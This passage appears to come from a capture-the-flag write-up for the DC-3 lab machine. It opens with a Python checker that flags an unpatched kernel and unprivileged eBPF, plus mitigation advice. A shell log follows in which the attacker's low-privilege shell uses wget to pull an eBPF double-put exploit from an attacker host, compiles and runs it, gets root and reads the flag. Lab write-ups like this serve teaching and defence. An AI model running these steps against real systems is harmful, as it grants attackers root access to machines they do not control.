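def unprivileged_bpf_disabled(sysctl_output: str) -> bool:
    """Parse `sysctl kernel.unprivileged_bpf_disabled` output; True if bpf() is root-only.
    The knob first appeared in Linux 4.4, so an empty result on older kernels means 'not disabled'."""
    for line in sysctl_output.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "kernel.unprivileged_bpf_disabled":
            return value.strip() != "0"
    return False


def assess(uname_a: str, sysctl_output: str, patched_release: str) -> List[str]:
    """Combine both checks into a list of findings for a host."""
    findings = []
    release = release_from_uname(uname_a)
    if older_than(release, patched_release):
        findings.append("kernel %s is older than the patched build %s: update and reboot"
                        % (release, patched_release))
    if not unprivileged_bpf_disabled(sysctl_output):
        findings.append("kernel.unprivileged_bpf_disabled is 0: unprivileged users can load eBPF "
                        "programs; set it to 1 unless a workload needs it")
    return findings


# The uname line captured on this page
PAGE_UNAME = "Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux"
# Constructed sysctl output for this example (the default on this kernel series)
SAMPLE_SYSCTL = "kernel.unprivileged_bpf_disabled = 0\n"
# Placeholder reference build, NOT the real fixed version; take it from the advisory
PATCHED_RELEASE_PLACEHOLDER = "4.4.0-22-generic"

if __name__ == "__main__":
    for finding in assess(PAGE_UNAME, SAMPLE_SYSCTL, PATCHED_RELEASE_PLACEHOLDER):
        print("FINDING:", finding)
```

Setting `kernel.unprivileged_bpf_disabled=1` (persisted in /etc/sysctl.d/) is a cheap, generic mitigation for the whole class of unprivileged-eBPF bugs this exploit family belongs to, and it is unrelated to the patch level; the ABI comparison is what tells you whether the specific fix is installed.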

www-data@DC-3:/tmp/test$ wget 192.168.56.144:8000/exploit.tar
wget 192.168.56.144:8000/exploit.tar
--2023-05-31 19:14:40-- http://192.168.56.144:8000/exploit.tar
Connecting to 192.168.56.144:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'

0K .......... .......... 100% 35.8M=0.001s

2023-05-31 19:14:40 (35.8 MB/s) - 'exploit.tar' saved [20480/20480]

www-data@DC-3:/tmp/test$ ls -la
ls -la
total 64
drwxr-xr-x 2 www-data www-data 4096 May 31 19:14 .
drwxrwxrwt 9 root root 4096 May 31 19:09 ..
-rw-r--r-- 1 www-data www-data 13176 May 31 19:06 45010.c
-rwxr-xr-x 1 www-data www-data 16764 May 31 19:09 exp
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
www-data@DC-3:/tmp/test$ tar xvf exploi
tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/test$ ls
ls
45010.c
ebpf_mapfd_doubleput_exploit
exp
exploit.tar
www-data@DC-3:/tmp/test$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 .
drwxr-xr-x 3 www-data www-data 4096 May 31 19:14 ..
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ./comp
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 60
drwxr-x--- 2 www-data www-data 4096 May 31 19:15 .
drwxr-xr-x 3 www-data www-data 4096 May 31 19:14 ..
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 May 31 19:15 doubleput
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 May 31 19:15 hello
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 May 31 19:15 suidhelper
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls -la
total 28
drwx------ 2 root root 4096 Apr 25 2020 .
drwxr-xr-x 22 root root 4096 Mar 23 2019 ..
-rw------- 1 root root 1202 Apr 25 2020 .bash_history
-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc
-rw------- 1 root root 71 Mar 23 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw------- 1 root root 0 Apr 25 2020 .viminfo
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Privilege escalation successful.